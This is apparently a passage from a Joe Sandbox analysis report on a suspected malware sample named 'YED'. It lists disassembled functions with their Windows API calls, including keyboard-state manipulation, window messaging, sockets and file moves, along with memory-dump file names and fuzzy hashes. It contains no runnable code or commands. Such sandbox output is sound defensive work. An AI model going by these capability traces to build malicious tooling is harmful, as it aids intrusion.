__freea.LIBCMT ref: 002517A2
__freea.LIBCMT ref: 002517AE

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: d693ef0602c2a7642af77713a8c07fc0c5af47293b8b7d8b82d765cefaa8483f
Instruction ID: 09d6e92d7f552e69288a2c3e0be6dad69ce6127cc3e1a598de3c048f9031156e
Opcode Fuzzy Hash: d693ef0602c2a7642af77713a8c07fc0c5af47293b8b7d8b82d765cefaa8483f
Instruction Fuzzy Hash: 7091C671E202169ADF248E78CC81BEEBBB59F49311F580659EC05E7181EB35DC78CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00294523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00294648
VariantInit.OLEAUT32(?), ref: 00294749
VariantClear.OLEAUT32(?), ref: 00294753
VariantClear.OLEAUT32(?), ref: 002947B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0029472C
Null Object assignment in FOR..IN loop, xrefs: 002945D8, 00294706, 002947BE

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: bee327573b40a2c0a9c80ba3debba993057066f35241dc0c8c0772218e1179ab
Instruction ID: eb650aad4da6aee393e1fc847c58cd5ed82536b68269c3e93047107360489afc
Opcode Fuzzy Hash: bee327573b40a2c0a9c80ba3debba993057066f35241dc0c8c0772218e1179ab
Instruction Fuzzy Hash: BA91A471A20219ABDF24DFA4DC84FEEBBB8EF46714F108559F505AB280D7709952CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00281187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0028125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00281284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 002812A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002812D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0028135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002813C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00281430

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: a25fb44bb105cd6e93e40b85aaf7f627d84e7c2cb140fc541c360def4114cced
Instruction ID: 254a38089c40eeb42d02e0ff46d436fcfa01a97451f9ef98b7f77beae060f786
Opcode Fuzzy Hash: a25fb44bb105cd6e93e40b85aaf7f627d84e7c2cb140fc541c360def4114cced
Instruction Fuzzy Hash: D091D079A21219AFEB00AF94D884BBE77B9FF45315F104029E900E72D1D774A976CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0022948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 0acbdb421a7f586876e83f3ae7d720480b9339fb9ee9eff1bec452f84bd2c503
Instruction ID: 552b5d3bdef2879795870d8551eb28775e0f2fa69f024661f075359fe4840858
Opcode Fuzzy Hash: 0acbdb421a7f586876e83f3ae7d720480b9339fb9ee9eff1bec452f84bd2c503
Instruction Fuzzy Hash: 04911671E1021AAFCB10CFE9D884AEEBBB8FF49320F144155E515B7251D678A9A1CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00294BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0027000E: CLSIDFromProgID.OLE32 ref: 0027002B
Part of subcall function 0027000E: ProgIDFromCLSID.OLE32(?,00000000), ref: 00270046
Part of subcall function 0027000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0026FF41,80070057,?,?), ref: 00270054
Part of subcall function 0027000E: CoTaskMemFree.OLE32(00000000), ref: 00270064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00294C51
_wcslen.LIBCMT ref: 00294D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00294DCF
CoTaskMemFree.OLE32(?), ref: 00294DDA

Strings

NULL Pointer assignment, xrefs: 00294E23, 00294E52

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: c5256cf3a9feed9e633dfe4b735744eae0543ef081582fc04f137023feb890ae
Instruction ID: c4ab20b70c7ebaf824f1004e489ce3c4f4507563522b0481d37f189ec3c709e9
Opcode Fuzzy Hash: c5256cf3a9feed9e633dfe4b735744eae0543ef081582fc04f137023feb890ae
Instruction Fuzzy Hash: B9913871D1021DAFDF14EFA4C891EEEB7B8BF08304F10816AE919A7251DB309A55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 002A20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32 ref: 002A2183
GetMenuItemCount.USER32(00000000), ref: 002A21B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002A21DD
_wcslen.LIBCMT ref: 002A2213
GetMenuItemID.USER32(?,?), ref: 002A224D
GetSubMenu.USER32 ref: 002A225B

Part of subcall function 00273A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00273A57
Part of subcall function 00273A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,002725B3), ref: 00273A5E
Part of subcall function 00273A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00273A65

PostMessageW.USER32 ref: 002A22E3

Part of subcall function 0027E97B: Sleep.KERNEL32 ref: 0027E9F3

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 1beed92607aca853001ac95809c2e401e27cf464853ada4eaa572ade66e7fb92
Instruction ID: 9821dc25f5621b68340cc197067f4f2d455e340772dade8fba091bc18a2d2761
Opcode Fuzzy Hash: 1beed92607aca853001ac95809c2e401e27cf464853ada4eaa572ade66e7fb92
Instruction Fuzzy Hash: B4718E75A20205EFCB10DFA8C845AAEB7F5EF89310F108499E916EB351DB34ED558F90

Uniqueness

Uniqueness Score: -1.00%

Function 02A580D3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 193COMMON

Download Yara Rule

APIs

Part of subcall function 02A38254: _wcslen.LIBCMT ref: 02A38277

_wcslen.LIBCMT ref: 02A5814E
_wcslen.LIBCMT ref: 02A5819C
_wcslen.LIBCMT ref: 02A581DC
_wcslen.LIBCMT ref: 02A5826E

Strings

D`L, xrefs: 02A58148
P`L, xrefs: 02A58265

Memory Dump Source

Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_29d0000_YED.jbxd

Similarity

API ID: _wcslen
String ID: D`L$P`L
API String ID: 176396367-3785639107
Opcode ID: 4b3cc491f6bc5946fd9330b71a4f55c5b5638de3ed32a007bc476e749d4c12ad
Instruction ID: 3c2ba142b6ba3b31ba243049e3680986ecbe346732ca6508d77b5e67fb7c9d3f
Opcode Fuzzy Hash: 4b3cc491f6bc5946fd9330b71a4f55c5b5638de3ed32a007bc476e749d4c12ad
Instruction Fuzzy Hash: 3051B931A015269FCB14DF6CC9809BFB7B6BF54324B214229ED66E7284DB39DD81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0027AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0027AEF9
GetKeyboardState.USER32(?), ref: 0027AF0E
SetKeyboardState.USER32(?), ref: 0027AF6F
PostMessageW.USER32 ref: 0027AF9D
PostMessageW.USER32 ref: 0027AFBC
PostMessageW.USER32 ref: 0027AFFD
PostMessageW.USER32 ref: 0027B020

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: a4ccdf16cc7675fe8b1a7ca0bcee6aedef151460f3e0495dbc40f21523be89d9
Instruction ID: 5ced176a8a424931cbb77ef887358f5291644e80acaad4ee7bf7ff6d4a97474c
Opcode Fuzzy Hash: a4ccdf16cc7675fe8b1a7ca0bcee6aedef151460f3e0495dbc40f21523be89d9
Instruction Fuzzy Hash: 7151E5A09243D23DFB3746348845BBB7E995B46314F08C589E1DD858C2C3A998E4D752

Uniqueness

Uniqueness Score: -1.00%

Function 0027ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0027AD19
GetKeyboardState.USER32(?), ref: 0027AD2E
SetKeyboardState.USER32(?), ref: 0027AD8F
PostMessageW.USER32 ref: 0027ADBB
PostMessageW.USER32 ref: 0027ADD8
PostMessageW.USER32 ref: 0027AE17
PostMessageW.USER32 ref: 0027AE38

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 8fec7f90d36d57d2e732b4a12d90e438e6557c778fd86480196676b2cb1971c1
Instruction ID: e4c0ceb6dd602218ba96db255ac7fdf71b34e146c160a41181c0ec711e83b14c
Opcode Fuzzy Hash: 8fec7f90d36d57d2e732b4a12d90e438e6557c778fd86480196676b2cb1971c1
Instruction Fuzzy Hash: 8C51E6A19247D23EFB378B248C45B7E7E985B86310F08C498E0DD468C3C6B4ECA4D752

Uniqueness

Uniqueness Score: -1.00%

Function 0024542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 00245470
__fassign.LIBCMT ref: 002454EB
__fassign.LIBCMT ref: 00245506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00253CD6,00000005,00000000,00000000), ref: 0024552C
WriteFile.KERNEL32(?,00253CD6,00000000,00245BA3,00000000), ref: 0024554B
WriteFile.KERNEL32(?,?,00000001,00245BA3,00000000), ref: 00245584

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 90c86d7da5737bf70c82514a393503c4f06d6cab38bc973a3f4566c93399eac3
Instruction ID: afc24ad09da0fabbfcb92835f9e50ebd3dd221f93a2e04a6fdf92524668d4dc2
Opcode Fuzzy Hash: 90c86d7da5737bf70c82514a393503c4f06d6cab38bc973a3f4566c93399eac3
Instruction Fuzzy Hash: 6B5103B0A10649AFDB15CFA8D885AEEBBF9EF09300F14401AF585E7292D7709A51CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02A3E119 Relevance: 10.6, APIs: 7, Instructions: 137COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 02A3E13B
_wcslen.LIBCMT ref: 02A3E179
_wcslen.LIBCMT ref: 02A3E1AF
_wcslen.LIBCMT ref: 02A3E1DF
_wcslen.LIBCMT ref: 02A3E1EF
_wcslen.LIBCMT ref: 02A3E22B
_wcslen.LIBCMT ref: 02A3E25A

Memory Dump Source

Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_29d0000_YED.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: d03df3173b9aea2476220ea7b25a46e51c2860381b7c24efb530bb94b21ae5d6
Instruction ID: 0c4138aaa17b5343578a952f30d35949c37f34d6b5a5093ba29508b7b8fe1445
Opcode Fuzzy Hash: d03df3173b9aea2476220ea7b25a46e51c2860381b7c24efb530bb94b21ae5d6
Instruction Fuzzy Hash: CA41B266C1021876CB92EBF488859CFB7A9AF84710F509863F618E3120FB34D255C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 029F2120 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 029F214B
___except_validate_context_record.LIBVCRUNTIME ref: 029F2153
_ValidateLocalCookies.LIBCMT ref: 029F21E1
__IsNonwritableInCurrentImage.LIBCMT ref: 029F220C
_ValidateLocalCookies.LIBCMT ref: 029F2261

Strings

csm, xrefs: 029F21F6

Memory Dump Source

Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_29d0000_YED.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 17a0005c6933a5144f9f8d8205935f8b0f75e75d15b2970b1a508403548e2111
Instruction ID: 4451e5eb00f398759bbdf0b9b7ccf9afde6bc5542ef0a29c0de464ccf87ff155
Opcode Fuzzy Hash: 17a0005c6933a5144f9f8d8205935f8b0f75e75d15b2970b1a508403548e2111
Instruction Fuzzy Hash: 12419334E002099BCB90DF68CC84B9EBBB9BF85368F148156EF156B391D731AA51CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002910B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0029304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0029307A
Part of subcall function 0029304E: _wcslen.LIBCMT ref: 0029309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00291112
WSAGetLastError.WSOCK32 ref: 00291121
WSAGetLastError.WSOCK32 ref: 002911C9
closesocket.WSOCK32(00000000), ref: 002911F9

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 0c65e6228be78060b5ba8d775ca571530e87204f961ccbb937e42504004a8c95
Instruction ID: 6f23f9ed1f3d5518eb6ca7da3d9e1b5f60dd8fb81722cbcc6890e795399570a7
Opcode Fuzzy Hash: 0c65e6228be78060b5ba8d775ca571530e87204f961ccbb937e42504004a8c95
Instruction Fuzzy Hash: 1641F431610206AFDB109F15D888BA9BBE9FF45324F248059FD199B291CB74EDA1CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 0027CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0027DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0027CF22,?), ref: 0027DDFD

Part of subcall function 0027DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0027CF22,?), ref: 0027DE16

lstrcmpiW.KERNEL32(?,?), ref: 0027CF45
MoveFileW.KERNEL32 ref: 0027CF7F
_wcslen.LIBCMT ref: 0027D005
_wcslen.LIBCMT ref: 0027D01B
SHFileOperationW.SHELL32(?), ref: 0027D061

Strings

\*.*, xrefs: 0027CFF3

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 4cecb8ab323c4226ca60929c9ceceb0f9521dbd5eccb52d5704ba33979f64882
Instruction ID: 531a4f69491d60919d8edfabd88a29090fc2fd18f233badf67988eb3e0ed4b22
Opcode Fuzzy Hash: 4cecb8ab323c4226ca60929c9ceceb0f9521dbd5eccb52d5704ba33979f64882
Instruction Fuzzy Hash: 5B4198718152195FDF12EFB4C981BDDB7B8AF09340F1040E6E50DE7141EA34AA94CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002A2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 002A2E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 002A2E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 002A2E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 002A2EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 002A2EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 002A2EF1
SetWindowLongW.USER32 ref: 002A2F0B

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 41e68ef44e226605dde86f651530011c47c435fc9e7807514cd3bbd323718433
Instruction ID: caed1071d729cf2d7b9616a6ca27bb0ffba8113708ae4efe36e20bf755470caa
Opcode Fuzzy Hash: 41e68ef44e226605dde86f651530011c47c435fc9e7807514cd3bbd323718433
Instruction Fuzzy Hash: 6731E230654151EFDB25CF5CED88F6537E5EB8AB10F150164F9049F2A2CB71B8A8DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00277726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00277769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0027778F
SysAllocString.OLEAUT32(00000000), ref: 00277792
SysAllocString.OLEAUT32(?), ref: 002777B0
SysFreeString.OLEAUT32(?), ref: 002777B9
StringFromGUID2.OLE32(?,?,00000028), ref: 002777DE
SysAllocString.OLEAUT32(?), ref: 002777EC

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: fa7ff6e652a80911d657da4c0002790fdc0e0c6fe51f14675691e7ed87f7a27e
Instruction ID: f427060448ad05bc5bc4c39acd9687d7c7be4eb64b908d39f2cfc6b5ed825204
Opcode Fuzzy Hash: fa7ff6e652a80911d657da4c0002790fdc0e0c6fe51f14675691e7ed87f7a27e
Instruction Fuzzy Hash: BA21C476614219AFDF14EFA8DC88CBBB7ECEB0A3647108025F908DB150DA70DC418B64

Uniqueness

Uniqueness Score: -1.00%

Function 002777FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00277842
